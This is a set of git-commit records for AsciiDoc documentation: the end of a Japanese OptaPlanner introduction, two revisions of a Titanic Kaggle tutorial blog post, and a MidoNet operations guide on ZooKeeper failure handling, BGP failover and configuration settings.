\u306b\u3042\u308b\u3059\u3079\u3066\u306e\u30af\u30e9\u30b9\u306b\u306f\u3001\u5f8c\u65b9\u4e92\u63db\u6027\u304c\u3042\u308a\u307e\u305b\u3093\u3002\u5c06\u6765\u306e\u30ea\u30ea\u30fc\u30b9\u306b\u304a\u3044\u3066\u5909\u66f4\u3055\u308c\u308b\u53ef\u80fd\u6027\u304c\u3042\u308a\u307e\u3059\u3002link:https:\/\/github.com\/droolsjbpm\/optaplanner\/blob\/master\/optaplanner-distribution\/src\/main\/assembly\/filtered-resources\/UpgradeFromPreviousVersionRecipe.txt[UpgradeFromPreviousVersionRecipe.txt]\u3068\u547c\u3070\u308c\u308b\u30ec\u30b7\u30d4\u306b\u306f\u3001\u65b0\u3057\u3044\u30d0\u30fc\u30b8\u30e7\u30f3\u306b\u30a2\u30c3\u30d7\u30b0\u30ec\u30fc\u30c9\u3059\u308b\u5834\u5408\u306e\u3001\u5404\u5909\u66f4\u5185\u5bb9\u304a\u3088\u3073\u305d\u306e\u5909\u66f4\u306b\u3059\u3070\u3084\u304f\u5bfe\u51e6\u3059\u308b\u65b9\u6cd5\u304c\u8a18\u8ff0\u3055\u308c\u3066\u3044\u307e\u3059\u3002\n* *XML \u8a2d\u5b9a:* XML \u30bd\u30eb\u30d0\u8a2d\u5b9a\u306f\u3001\u975e\u30d1\u30d6\u30ea\u30c3\u30af API \u30af\u30e9\u30b9\u3092\u4f7f\u7528\u3059\u308b\u5fc5\u8981\u306e\u3042\u308b\u8981\u7d20\u3092\u9664\u304f\u3059\u3079\u3066\u306e\u8981\u7d20\u306b\u3064\u3044\u3066\u3001\u5f8c\u65b9\u4e92\u63db\u6027\u3092\u6709\u3057\u307e\u3059\u3002XML \u30bd\u30eb\u30d0\u8a2d\u5b9a\u306f\u3001\u30d1\u30c3\u30b1\u30fc\u30b8\u540d\u524d\u7a7a\u9593 +*org.optaplanner.core.config*+ \u306b\u3042\u308b\u30af\u30e9\u30b9\u306b\u3088\u3063\u3066\u5b9a\u7fa9\u3055\u308c\u307e\u3059\u3002\n\n.\u6ce8\u610f\n****\n\u672c\u8aac\u660e\u66f8\u3067\u306f\u3001impl \u30af\u30e9\u30b9\u3082\u3044\u304f\u3064\u304b\u6271\u308f\u308c\u3066\u3044\u307e\u3059\u3002\u305d\u308c\u3089\u6587\u66f8\u5316\u3055\u308c\u305f impl \u30af\u30e9\u30b9\u306f\u3001(\u672c\u8aac\u660e\u66f8\u3067\u5b9f\u9a13\u7684\u306a\u3082\u306e\u3060\u3068\u660e\u8a18\u3055\u308c\u306a\u3044\u9650\u308a) \u4fe1\u983c\u6027\u304c\u3042\u308a\u3001\u5b89\u5168\u306b\u4f7f\u7528\u3067\u304d\u307e\u3059\u3002\u305f\u3060\u3057\u3001\u305d\u308c\u3089\u306f\u3001\u78ba\u5b9a\u7684\u306b\u8a18\u8ff0\u3059\u308b\u306b\u306f\u307e\u3060\u6642\u671f\u5c1a\u65e9\u306a\u3082\u306e\u3060\u3068\u79c1\u305f\u3061\u306f\u8003\u3048\u3066\u3044\u307e\u3059\u3002\n\/\/\/\/\n150915 Takugo\nSource: we're just not entirely comfortable yet to write their signatures in stone\nInterpreted as: the impl classes are still subject to changes. \n\/\/\/\/\n****\n\n\n\n[[communityAndSupport]]\n=== 1.5.3. \u30b3\u30df\u30e5\u30cb\u30c6\u30a3\u3068\u30b5\u30dd\u30fc\u30c8\n\n\u30cb\u30e5\u30fc\u30b9\u3084\u8a18\u4e8b\u306f\u3001link:https:\/\/www.optaplanner.org\/blog\/[\u79c1\u305f\u3061\u306e\u30d6\u30ed\u30b0] \u3084 Google+ (link:https:\/\/plus.google.com\/\\+OptaPlannerOrg[OptaPlanner], link:https:\/\/plus.google.com\/\\+GeoffreyDeSmet[Geoffrey De Smet])\u3001Twitter (link:https:\/\/twitter.com\/OptaPlanner[OptaPlanner], link:https:\/\/twitter.com\/GeoffreyDeSmet[Geoffrey De Smet]) \u3067\u78ba\u8a8d\u3057\u3066\u304f\u3060\u3055\u3044\u3002*OptaPlanner \u304c\u5f79\u306b\u7acb\u3063\u305f\u5834\u5408\u306b\u306f\u3001\u305d\u306e\u3053\u3068\u306b\u3064\u3044\u3066\u30d6\u30ed\u30b0\u306b\u66f8\u3044\u305f\u308a Twitter \u3067\u3064\u3076\u3084\u3044\u305f\u308a\u3057\u3066\u3001\u79c1\u305f\u3061\u3092\u3054\u652f\u63f4\u304f\u3060\u3055\u3044\uff01*\n\nlink:https:\/\/www.optaplanner.org\/community\/forum.html[\u79c1\u305f\u3061\u306e\u30b3\u30df\u30e5\u30cb\u30c6\u30a3\u30fc\u306e\u516c\u958b\u30d5\u30a9\u30fc\u30e9\u30e0]\u3067\u306e\u8cea\u554f\u3084link:https:\/\/issues.jboss.org\/browse\/PLANNER[\u8ab2\u984c\u30c8\u30e9\u30c3\u30ab\u30fc]\u3067\u306e\u30d0\u30b0\u5831\u544a\u3001\u6a5f\u80fd\u8981\u671b\u3092\u6b53\u8fce\u3057\u307e\u3059\u3002GitHub \u3078\u306e pull \u8981\u6c42\u3092\u5927\u3044\u306b\u6b53\u8fce\u3057\u3001\u512a\u5148\u7684\u306b\u6271\u3044\u307e\u3059\uff01\u3054\u81ea\u8eab\u306e\u6539\u5584\u3092\u30aa\u30fc\u30d7\u30f3\u30bd\u30fc\u30b9\u5316\u3059\u308c\u3070\u3001\u305d\u308c\u306b\u5bfe\u3057\u3066\u79c1\u305f\u3061\u304c\u52a0\u3048\u308b\u5c02\u9580\u7684\u306a\u30c1\u30a7\u30c3\u30af\u3084\u3055\u3089\u306a\u308b\u6539\u826f\u3092\u3054\u81ea\u8eab\u306e\u305f\u3081\u306b\u5f79\u7acb\u3066\u308b\u3053\u3068\u304c\u3067\u304d\u307e\u3059\u3002\n\nRed Hat \u306f\u3001\u4e2d\u6838\u3068\u306a\u308b\u30c1\u30fc\u30e0\u3092\u96c7\u7528\u3059\u308b\u5f62\u3067\u3001OptaPlanner \u306e\u5c55\u958b\u3092\u5f8c\u63f4\u3057\u3066\u3044\u307e\u3059\u3002\u4f01\u696d\u5411\u3051\u306e\u30b5\u30dd\u30fc\u30c8\u3084\u30b3\u30f3\u30b5\u30eb\u30c6\u30a3\u30f3\u30b0\u306b\u3064\u3044\u3066\u306f\u3001link:https:\/\/www.optaplanner.org\/community\/product.html[BRMS \u304a\u3088\u3073 BPMS \u88fd\u54c1] (\u542b OptaPlanner) \u3092\u53c2\u7167\u3059\u308b\u304b\u3001link:http:\/\/www.redhat.com\/en\/about\/contact\/sales[Red Hat \u3078\u304a\u554f\u3044\u5408\u308f\u305b]\u304f\u3060\u3055\u3044\u3002\n\n\n\n[[relationshipWithKie]]\n=== 1.5.4. Drools \u3084 jBPM \u3068\u306e\u95a2\u4fc2\n\nOptaPlanner \u306f\u3001link:https:\/\/www.kiegroup.org\/[KIE \u30d7\u30ed\u30b8\u30a7\u30af\u30c8\u30fb\u30b0\u30eb\u30fc\u30d7]\u306e\u4e00\u90e8\u3067\u3059\u3002KIE \u30b0\u30eb\u30fc\u30d7\u306f\u3001link:https:\/\/www.drools.org\/[Drools] \u30eb\u30fc\u30eb\u30a8\u30f3\u30b8\u30f3\u3068 link:https:\/\/www.jbpm.org\/[jBPM] \u30ef\u30fc\u30af\u30d5\u30ed\u30fc\u30a8\u30f3\u30b8\u30f3\u3068\u3068\u3082\u306b\u3001\u5b9a\u671f\u7684\u306b (\u901a\u5e38 1\u301c2 \u56de\/\u6708) \u30ea\u30ea\u30fc\u30b9\u3055\u308c\u307e\u3059\u3002\n\/\/\/\/\n150916 Takugo\nSource: It releases regularly\nInterpreted as: The KIE group is released regularly\n\/\/\/\/\n\nimage::https:\/\/docs.optaplanner.org\/6.4.0.Final\/optaplanner-docs\/html_single\/images\/Chapter-Planner_introduction\/kieFunctionalityOverview.png[]\n\nDrools \u3092\u7528\u3044\u305f\u30aa\u30d7\u30b7\u30e7\u30f3\u306e\u7d71\u5408\u306b\u3064\u3044\u3066\u3088\u308a\u591a\u304f\u77e5\u308b\u306b\u306f\u3001link:https:\/\/docs.optaplanner.org\/6.4.0.Final\/optaplanner-docs\/html_single\/index.html#architectureOverview[\u69cb\u9020\u306e\u6982\u8981]\u3092\u53c2\u7167\u3057\u3066\u304f\u3060\u3055\u3044\u3002\n\n\n\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5ee3cc9e6b39b4b16f717ad348c27c18fb12a708","subject":"Update 2017-04-16-Predict-Survival-Propensity-of-Titanic-Passengers.adoc","message":"Update 2017-04-16-Predict-Survival-Propensity-of-Titanic-Passengers.adoc","repos":"roobyz\/roobyz.github.io,roobyz\/roobyz.github.io,roobyz\/roobyz.github.io,roobyz\/roobyz.github.io","old_file":"_posts\/2017-04-16-Predict-Survival-Propensity-of-Titanic-Passengers.adoc","new_file":"_posts\/2017-04-16-Predict-Survival-Propensity-of-Titanic-Passengers.adoc","new_contents":"\/\/ = Your Blog title\n\/\/ See https:\/\/hubpress.gitbooks.io\/hubpress-knowledgebase\/content\/ for information about the parameters.\n\/\/ :hp-image: \/covers\/cover.png\n\/\/ :published_at: 2019-01-31\n\/\/ :hp-tags: HubPress, Blog, Open_Source,\n\/\/ :hp-alt-title: My English Title\n\n= Titanic: Learning Data Science with RStudio\n:hp-alt-title: Predict Survival Propensity of Titanic Passengers\n:hp-tags: Blog, Open_Source, Machine_Learning, Analytics, Data_Science\n:icons: image\n\nSo we are aspiring data scientists and want to dip our toes into link:http:\/\/rmarkdown.rstudio.com\/[RStudio]. How do we get started? We dive into the into the waters of the link:https:\/\/www.kaggle.com\/c\/titanic[Kaggle Titanic \"Competition\"], of course!\n\nOur objective: \n\n* learn how to think about the competition from a data science perspective\n* get somewhat comfortable with RStudio\n* predict whether or not a passenger would survive the sinking of the link:https:\/\/en.wikipedia.org\/wiki\/RMS_Titanic[RMS Titanic]\n* enter a Kaggle submission file for evaluation\n* profit!\n\n== Kaggle Basics\n\nKaggle is a community of data scientists and a platform for facilitating data science journeys. One way to participate, is by entering data science competitions. Similar to other competitions, Kaggle provides two Titanic datasets containing passenger attributes:\n\n* a _training set_, complete with the outcome (target) variable for training our predictive model(s)\n* a _test set_, for predicting the unknown outcome variable based on the passenger attributes provided in both datasets.\n\nAfter training and validating our predictive model(s), we can then enter the submission file to Kaggle for evaluation. As we iterate, we can submit more files and assess our progress on the leaderboard. Subtle model improvements can lead to significant leaps on the leaderboard.\n\n[cols=\"1, 8a\"]\n|===\n|image:\/images\/icons\/tip.png[icon=\"tip\",size=\"4x\",width=56]\n|*Data Science Perspective*\n\nWe need to use the provided attributes (variables) to train a predictive model, and how does that work? Some variables are correlated with each other. When those variables vary, the correlated variables will also vary to some degree. We need to:\n\n * maximize the number of explanatory variables: those that are correlated with the outcome variable, and \n\n * minimize the correlation of explanatory variables to each other (link:https:\/\/en.wikipedia.org\/wiki\/Multicollinearity[multicollinearity]).\n\nIn other words, we need to find the fewest quantity of variables that can explain everything that is going on with the outcome that we want to predict.\n|===\n\n\n== Titanic History Lesson\n\nThe Titanic was a British passenger liner that sank after colliding with an iceberg in the Atlantic on its maiden voyage en route to New York City. It was the largest ship of its time with 10 decks, 8 of which were for passengers. \n\nThere were 2,224 passengers and crew aboard. Of the 1,317 passengers, there were: 324 in First Class (including some of the wealthiest people of the time), 284 in Second Class, and 709 in Third Class. Of these, 869 (66%) were male and 447 (34%) female. There were 107 children aboard, the largest number of which were in Third Class.\n\nThe ship had enough lifeboats for about 1,100 passengers, and more than 1,500 died. Due to the \"women and children first\" protocol, men were disproportionately left aboard. Also, not all lifeboats were completely filled during the evacuation. The 705 surviving passengers were rescued by the RMS Carpathia around 2 hours after the catastrophe.\n\n== Tutorial Approach\n\nWe'll approach this project in multiple parts. This is still a work in progress, but roughly speaking it should look like:\n\n. Part 1: Basic Setup\n. Part 2: Feature Engineering\n. Part 3: Prediction\n. Part 4: Conclusion\n\n\/\/[[app-listing]]\n\/\/[source,ruby]\n\/\/.test.ruby\n\/\/----\n\/\/----\n\n\n","old_contents":"\/\/ = Your Blog title\n\/\/ See https:\/\/hubpress.gitbooks.io\/hubpress-knowledgebase\/content\/ for information about the parameters.\n\/\/ :hp-image: \/covers\/cover.png\n\/\/ :published_at: 2019-01-31\n\/\/ :hp-tags: HubPress, Blog, Open_Source,\n\/\/ :hp-alt-title: My English Title\n\n= Titanic: Learning Data Science with RStudio\n:hp-alt-title: Predict Survival Propensity of Titanic Passengers\n:hp-tags: Blog, Open_Source, Machine_Learning, Analytics, Data_Science\n:icons: image\n\nSo we are aspiring data scientists and want to dip our toes into link:http:\/\/rmarkdown.rstudio.com\/[RStudio]. How do we get started? We dive into the into the waters of the link:https:\/\/www.kaggle.com\/c\/titanic[Kaggle Titanic \"Competition\"], of course!\n\nOur objective: \n\n* learn how to think about the competition from a data science perspective\n* get somewhat comfortable with RStudio\n* predict whether or not a passenger would survive the sinking of the link:https:\/\/en.wikipedia.org\/wiki\/RMS_Titanic[RMS Titanic]\n* enter a Kaggle submission file for evaluation\n* profit!\n\n== Kaggle Basics\n\nKaggle is a community of data scientists and a platform for facilitating data science journeys. One way to participate, is by entering data science competitions. Similar to other competitions, Kaggle provides two Titanic datasets containing passenger attributes:\n\n* a _training set_, complete with the outcome (target) variable for training our predictive model(s)\n* a _test set_, for predicting the unknown outcome variable based on the passenger attributes provided in both datasets.\n\nAfter training and validating our predictive model(s), we can then enter the submission file to Kaggle for evaluation. As we iterate, we can submit more files and assess our progress on the leaderboard. Subtle model improvements can lead to significant leaps on the leaderboard.\n\n[cols=\"2*\"]\n|===\n|image:\/images\/icons\/tip.png[icon=\"tip\",size=\"4x\",width=56]\n|*Data Science Perspective*\n\n|\n|We need to use the provided attributes (variables) to train a predictive model, and how does that work? Some variables are correlated with each other. When those variables vary, the correlated variables will also vary to some degree. We need to:\n\n- maximize the number of explanatory variables: those that are correlated with the outcome variable, and \n- minimize the correlation of explanatory variables to each other (link:https:\/\/en.wikipedia.org\/wiki\/Multicollinearity[multicollinearity]).\n\nIn other words, we need to find the fewest quantity of variables that can explain everything that is going on with the outcome that we want to predict.\n|===\n\n\n== Titanic History Lesson\n\nThe Titanic was a British passenger liner that sank after colliding with an iceberg in the Atlantic on its maiden voyage en route to New York City. It was the largest ship of its time with 10 decks, 8 of which were for passengers. \n\nThere were 2,224 passengers and crew aboard. Of the 1,317 passengers, there were: 324 in First Class (including some of the wealthiest people of the time), 284 in Second Class, and 709 in Third Class. Of these, 869 (66%) were male and 447 (34%) female. There were 107 children aboard, the largest number of which were in Third Class.\n\nThe ship had enough lifeboats for about 1,100 passengers, and more than 1,500 died. Due to the \"women and children first\" protocol, men were disproportionately left aboard. Also, not all lifeboats were completely filled during the evacuation. The 705 surviving passengers were rescued by the RMS Carpathia around 2 hours after the catastrophe.\n\n== Tutorial Approach\n\nWe'll approach this project in multiple parts. This is still a work in progress, but roughly speaking it should look like:\n\n. Part 1: Basic Setup\n. Part 2: Feature Engineering\n. Part 3: Prediction\n. Part 4: Conclusion\n\n\/\/[[app-listing]]\n\/\/[source,ruby]\n\/\/.test.ruby\n\/\/----\n\/\/----\n\n\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"e76c5550d18ec1d1a9672b52b075e29d3b4aae34","subject":"Update 2017-04-16-Predict-Survival-Propensity-of-Titanic-Passengers.adoc","message":"Update 2017-04-16-Predict-Survival-Propensity-of-Titanic-Passengers.adoc","repos":"roobyz\/roobyz.github.io,roobyz\/roobyz.github.io,roobyz\/roobyz.github.io,roobyz\/roobyz.github.io","old_file":"_posts\/2017-04-16-Predict-Survival-Propensity-of-Titanic-Passengers.adoc","new_file":"_posts\/2017-04-16-Predict-Survival-Propensity-of-Titanic-Passengers.adoc","new_contents":"\/\/ = Your Blog title\n\/\/ See https:\/\/hubpress.gitbooks.io\/hubpress-knowledgebase\/content\/ for information about the parameters.\n\/\/ :hp-image: \/covers\/cover.png\n\/\/ :published_at: 2019-01-31\n\/\/ :hp-tags: HubPress, Blog, Open_Source,\n\/\/ :hp-alt-title: My English Title\n\n= Kaggle: Learning from Titanic\n:hp-alt-title: Predict Survival Propensity of Titanic Passengers\n:hp-tags: Blog, Open_Source, Machine_Learning, Analytics, Data_Science\n\nSo we are aspiring data scienctists and want to dip our toes into the the water. How do we get started using link:http:\/\/rmarkdown.rstudio.com\/[RStudio]? We dive into the into the waters of the link:https:\/\/www.kaggle.com\/c\/titanic[Kaggle Titanic Starting \"Competition\"], of course!\n\nOur objective: \n\n* learn how to think about the competition from a data science perspective\n* predict whether or not a passenger would survive the sinking of the link:https:\/\/en.wikipedia.org\/wiki\/RMS_Titanic[RMS Titanic]\n* enter a Kaggle submission file for evaluation\n* profit!\n\n== Kaggle Basics\n\nKaggle is a community of data scientists and a platform for facilitating data science journeys. To participate, you may enter data science competitions. Kaggle provides two datasets for the Titanic competition containing passenger attributes:\n\n* a training set, complete with the outcome (target) variable for training our predictive model.\n* a test set, for predicting the unknown outcome variable based on the passenger attributes provided in both datasets.\n\nAfter training and validating our predictive model, we then enter the submission file to Kaggle for evaluation.\n\n\/\/[icon=\"\/images\/note.png\"]\n[NOTE]\n.*Think like a Data Scientist*\n=====================================\nWe need to use the provided attributes (variables) to train a predictive model, but how does that work? \n\n- Some variables are correlated with each other. When those variables vary, the other variables will also vary to some degree\n- We need to maximize the number of explanatory variables: those that are correlated with the outcome variable and \n- minimize the correlation of explanatory variables to each other (link:https:\/\/en.wikipedia.org\/wiki\/Multicollinearity[multicollinearity]).\n\nIn other words, we need to find the fewest quantity of variables that can explain everything that is going on with the outcome that we want to predict.\n=====================================\n\n== Quick History Lesson\n\nThe Titanic was a British passenger liner that sank after colliding with an iceberg in the Atlantic on its maiden voyage enroute to New York City. It was the largest ship of its time with 10 decks, 8 of which were for passengers. There were approximately 2200 passengers and crew aboard. \n\nOf the 1,317 passenger, there were: 324 in First Class (including some of the wealthiest people of the time), 284 in Second Class, and 709 in Third Class. Of these, 869 (66%) were male and 447 (34%) female. There were 107 children aboard, the largest number of which were in Third Class.\n\nThe ship had enough life boats for about 1100 passengers, and more than 1500 died. Due to the \"women and children first\" protocol, men were disproportionately left aboard. Also, not all lifeboats were completely filled during the evacuation. The 705 surviving passengers were rescued by the RMS Carpathia around 2 hours after the catastrophe.\n\n\n\n\n\n","old_contents":"\/\/ = Your Blog title\n\/\/ See https:\/\/hubpress.gitbooks.io\/hubpress-knowledgebase\/content\/ for information about the parameters.\n\/\/ :hp-image: \/covers\/cover.png\n\/\/ :published_at: 2019-01-31\n\/\/ :hp-tags: HubPress, Blog, Open_Source,\n\/\/ :hp-alt-title: My English Title\n\n= Kaggle: Learning from Titanic\n:hp-alt-title: Predict Survival Propensity of Titanic Passengers\n:hp-tags: Blog, Open_Source, Machine_Learning, Analytics, Data_Science\n\nSo we are aspiring data scienctists and want to dip our toes into the the water. How do we get started using link:http:\/\/rmarkdown.rstudio.com\/[RStudio]? We dive into the into the waters of the link:https:\/\/www.kaggle.com\/c\/titanic[Kaggle Titanic Starting \"Competition\"], of course!\n\nOur objective: \n\n* learn how to think about the competition from a data science perspective\n* predict whether or not a passenger would survive the sinking of the link:https:\/\/en.wikipedia.org\/wiki\/RMS_Titanic[RMS Titanic]\n* enter a Kaggle submission file for evaluation\n* profit!\n\n== Kaggle Basics\n\nKaggle is a community of data scientists and a platform for facilitating data science journeys. To participate, you may enter data science competitions. Kaggle provides two datasets for the Titanic competition containing passenger attributes:\n\n* a training set, complete with the outcome (target) variable for training our predictive model.\n* a test set, for predicting the unknown outcome variable based on the passenger attributes provided in both datasets.\n\nAfter training and validating our predictive model, we then enter the submission file to Kaggle for evaluation.\n\n\/\/[icon=\"\/images\/note.png\"]\n[NOTE]\n.*Think like a Data Scientist*\n=====================================\nWe need to use the provided attributes (variables) to train a predictive model, but how does that work? \n\n- Some variables are correlated with each other. When those variables vary, the other variables will also vary to some degree\n- We need to maximize the number of explanatory variables: those that are correlated with the outcome variable and \n- minimize the correlation of explanatory variables to each other (link:https:\/\/en.wikipedia.org\/wiki\/Multicollinearity[Multicollinearity]).\n\nIn other words, we need to find the fewest quantity of variables that can explain everything that is going on with the outcome that we want to predict.\n=====================================\n\n== Quick History Lesson\n\nThe Titanic was a British passenger liner that sank after colliding with an iceberg in the Atlantic on its maiden voyage enroute to New York City. It was the largest ship of its time with 10 decks, 8 of which were for passengers. There were approximately 2200 passengers and crew aboard. \n\nOf the 1,317 passenger, there were: 324 in First Class (including some of the wealthiest people of the time), 284 in Second Class, and 709 in Third Class. Of these, 869 (66%) were male and 447 (34%) female. There were 107 children aboard, the largest number of which were in Third Class.\n\nThe ship had enough life boats for about 1100 passengers, and more than 1500 died. Due to the \"women and children first\" protocol, men were disproportionately left aboard. Also, not all lifeboats were completely filled during the evacuation. The 705 surviving passengers were rescued by the RMS Carpathia around 2 hours after the catastrophe.\n\n\n\n\n\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"f9d94d5fafb3d406f16e5dcb290bfdc5124568ce","subject":"OP Guide: Additions for ZK failure handling and maintenance","message":"OP Guide: Additions for ZK failure handling and maintenance\n\nChange-Id: I7754bbda02d46ee812b4f81367aeef416ee38d89\nRef: https:\/\/midonet.atlassian.net\/browse\/MND-202\nSigned-off-by: Jan Hilberath <14e793d896ddc8ca6911747228e86464cf420065@midokura.com>\n","repos":"midonet\/midonet-docs,midonet\/midonet-docs,midonet\/midonet-docs,midonet\/midonet-docs","old_file":"docs\/operation-guide\/src\/advanced\/section_midolman_configuration_en.adoc","new_file":"docs\/operation-guide\/src\/advanced\/section_midolman_configuration_en.adoc","new_contents":"[[midolman_configuration_options]]\n= MidoNet Agent (Midolman) configuration options\n\nThis section covers all configuration options for the MidoNet Agent.\n\nWe don't recommend making changes to the default values, except possibly the\n+zookeeper.session_gracetime+ and +agent.datapath.send_buffer_pool_buf_size_kb+\nsetting values.\n\n[WARNING]\nDo not modify the root key, cluster name, or keyspace unless you know what you\nare doing.\n\n++++\n<?dbhtml stop-chunking?>\n++++\n\n== MidoNet behavior after ZooKeeper cluster failure\n\nNodes running the MidoNet Agent, Midolman, depend on a live ZooKeeper session to\nload pieces of a virtual network topology on-demand and watch for updates to\nthose virtual devices.\n\nWhen ZooKeeper becomes inaccessible, a MidoNet Agent instance will continue\noperating for as long as there's a chance to recover connectivity while keeping\nthe same ZooKeeper session. The amount of operating time is thus dictated by the\nsession timeout, which you can control by editing the zookeeper\nsession_gracetime setting in mn-conf(1).\n\nOnce the session expires, the MidoNet Agent will give up and shut itself down,\nprompting upstart to re-launch it. If the ZooKeeper connection and session are\nrecovered within the session_gracetime, MidoNet Agent operation will resume\nuneventfully. The MidoNet Agent will learn of all the updates that happened to\nthe virtual topology while it was disconnected and will update its internal\nstate and flow tables accordingly.\n\nWhile the MidoNet Agent is running disconnected from ZooKeeper, waiting for the\nsession to come back, traffic will still be processed, but with reduced\nfunctionality, as follows:\n\n* The MidoNet Agent will not see updates to the virtual topology, thus packets\nmay be processed with a version of the network topology that's up to\nsession_gracetime too old.\n\n* The MidoNet Agent will be unable to load new pieces of the network topology.\nPackets that traverse devices that had never been loaded on a particular MidoNet\nAgent will error out.\n\n* The MidoNet Agent will not be able to perform or see updates to Address\nResolution Protocol (ARP) tables and Media Access Control (MAC) learning tables.\n\nAs time passes, a disconnected MidoNet Agent will become less and less useful.\nThe trade-offs presented above are key to choosing a sensible session_gracetime\nvalue; the default is 30 seconds.\n\nZooKeeper connectivity is not an issue for the MidoNet API server. The API\nrequests are stateless and will simply fail when there is no ZooKeeper\nconnectivity.\n\n== ZooKeeper configuration\n\nYou may use the ZooKeeper configuration section in +mn-conf(1)+ to adjust:\n\n* the ZooKeeper session timeout value (in milliseconds). This value determines\nwhen the system considers the connection between ZooKeeper and the MidoNet Agent\nto be interrupted.\n\n* the session grace timeout value (in milliseconds). This value determines the\nperiod of time during which the Agent can reconnect to ZooKeeper without causing\nnode outage.\n\n* the root path for MidoNet data.\n\n[source]\n----\nzookeeper {\n zookeeper_hosts = <comma separated IPs>\n session_timeout = 30000\n root_key = \/midonet\/v1\n session_gracetime = 30000\n}\n----\n\n=== Considerations for network partitions and ZooKeeper failure and maintenance\n\nFor the MidoNet Agents that run at compute hosts or L2GW hosts, setting the\nsession gracetime is primarily dictated by tradeoffs between maintaining\nliveness of the datapath and maintaining consistency relative to the\nauthoritative network topology and security policy.\n\nFor L3GW hosts with BGP enabled, the considerations are more difficult. While\nthe MidoNet Agent at the L3GW continues to operate disconnected, it continues to\nannounce routes to its BGP peers. If the disconnection from ZooKeeper is due to\na network partition that also separates the L3GW from a majority of compute\nhosts (rather than ZooKeeper failure\/maintenance), then it is practically\nblack-holing the traffic destined to computes that are outside its partition.\nHence session gracetime presents a tradeoff between increasing L3GW tolerance to\nZooKeeper failure (by increasing gracetime) and reducing duration of traffic\nblackholing (by reducing gracetime).\n\nMidoNet currently does not have a good solution to this tradeoff. In the future\nwe intend to build a blackhole detection mechanism at the L3GW so that it can\nshut down its BGP session during gracetime if it determines that it cannot\ndeliver most of the traffic it receives.\n\n=== Scheduling ZooKeeper maintenance\n\nWhen it's necessary to take all (or a majority) of ZooKeeper Quorum nodes down\nfor maintenance, the best practice is to increase the session_gracetime to a\nvalue higher than the anticipated maintenance. This should be done for all\nMidoNet Agents, both on computes and gateway hosts. After the maintenance event\nthe session_gracetime should be returned to the usual values, targeted at the\ndesired tradeoffs of consistency, ZooKeeper failure-tolerance and blackhole\nduration (see discussion above).\n\n== Cassandra configuration\n\nYou may use the Cassandra configuration section to adjust:\n\n* the database replication factor\n\n* the MidoNet cluster name\n\n[source]\n----\ncassandra {\n servers = <comma separated IPs>\n replication_factor = 1\n cluster = midonet\n}\n----\n\n== Datapath configuration\n\nThe agent uses a pool of reusable buffers to send requests to the datapath. You\nmay use the options in the +agent.datapath+ of mn-conf(1) to tune the pool's size\nand its buffers. One pool is created for each output channel, the settings\ndefined here will apply to each of those pools.\n\nIf you notice decreased performance because packet sizes exceed the maximum\nbuffer size, you can increase the value for the buf_size_kb setting. This\nsetting controls the buffer size (in KB). Be aware that the buffer size puts a\nlimit on the packet size that the MidoNet Agent can send. In a network that\njumbo frames traverse, adjust the size so one buffer will accommodate a whole\nframe, plus enough room for the flow's actions.\n\n== BGP failover configuration\n\nThe default BGP fail-over time is 2-3 minutes. However, you can reduce this time\nby changing some parameters on both ends of the session: in +mn-conf(1)+\n(the MidoNet side) and the remote end BGP peer configuration. The example\nbelow shows how to reduce the BGP fail-over time to one minute on the MidoNet\nside:\n\n[source]\n----\nagent {\n midolman {\n bgp_connect_retry=1\n bgp_holdtime=3\n bgp_keepalive=1\n }\n}\n----\n\nThe settings in mn-conf must match those on the remote end BGP peer configuration.\nFor more information about how to set them, see xref:bgp_failover[].\n","old_contents":"[[midolman_configuration_options]]\n= MidoNet Agent (Midolman) configuration options\n\nThis section covers all configuration options for the MidoNet Agent.\n\nWe don't recommend making changes to the default values, except possibly the\n+zookeeper.session_gracetime+ and +agent.datapath.send_buffer_pool_buf_size_kb+\nsetting values.\n\n[WARNING]\nDo not modify the root key, cluster name, or keyspace unless you know what you\nare doing.\n\n++++\n<?dbhtml stop-chunking?>\n++++\n\n== MidoNet behavior after ZooKeeper cluster failure\n\nNodes running the MidoNet Agent, Midolman, depend on a live ZooKeeper session to\nload pieces of a virtual network topology on-demand and watch for updates to\nthose virtual devices.\n\nWhen ZooKeeper becomes inaccessible, a MidoNet Agent instance will continue\noperating for as long as there's a chance to recover connectivity while keeping\nthe same ZooKeeper session. The amount of operating time is thus dictated by the\nsession timeout, which you can control by editing the zookeeper\nsession_gracetime setting in mn-conf(1).\n\nOnce the session expires, the MidoNet Agent will give up and shut itself down,\nprompting upstart to re-launch it. If the ZooKeeper connection and session are\nrecovered within the session_gracetime, MidoNet Agent operation will resume\nuneventfully. The MidoNet Agent will learn of all the updates that happened to\nthe virtual topology while it was disconnected and will update its internal\nstate and flow tables accordingly.\n\nWhile the MidoNet Agent is running disconnected from ZooKeeper, waiting for the\nsession to come back, traffic will still be processed, but with reduced\nfunctionality, as follows:\n\n* The MidoNet Agent will not see updates to the virtual topology, thus packets\nmay be processed with a version of the network topology that's up to\nsession_gracetime too old.\n\n* The MidoNet Agent will be unable to load new pieces of the network topology.\nPackets that traverse devices that had never been loaded on a particular MidoNet\nAgent will error out.\n\n* The MidoNet Agent will not be able to perform or see updates to Address\nResolution Protocol (ARP) tables and Media Access Control (MAC) learning tables.\n\nAs time passes, a disconnected MidoNet Agent will become less and less useful.\nThe trade-offs presented above are key to choosing a sensible session_gracetime\nvalue; the default is 30 seconds.\n\nZooKeeper connectivity is not an issue for the MidoNet API server. The API\nrequests are stateless and will simply fail when there is no ZooKeeper\nconnectivity.\n\n== ZooKeeper configuration\n\nYou may use the ZooKeeper configuration section in +mn-conf(1)+ to adjust:\n\n* the ZooKeeper session timeout value (in milliseconds). This value determines\nwhen the system considers the connection between ZooKeeper and the MidoNet Agent\nto be interrupted.\n\n* the session grace timeout value (in milliseconds). This value determines the\nperiod of time during which the Agent can reconnect to ZooKeeper without causing\nnode outage.\n\n* the root path for MidoNet data.\n\n[source]\n----\nzookeeper {\n zookeeper_hosts = <comma separated IPs>\n session_timeout = 30000\n root_key = \/midonet\/v1\n session_gracetime = 30000\n}\n----\n\n== Cassandra configuration\n\nYou may use the Cassandra configuration section to adjust:\n\n* the database replication factor\n\n* the MidoNet cluster name\n\n[source]\n----\ncassandra {\n servers = <comma separated IPs>\n replication_factor = 1\n cluster = midonet\n}\n----\n\n== Datapath configuration\n\nThe agent uses a pool of reusable buffers to send requests to the datapath. You\nmay use the 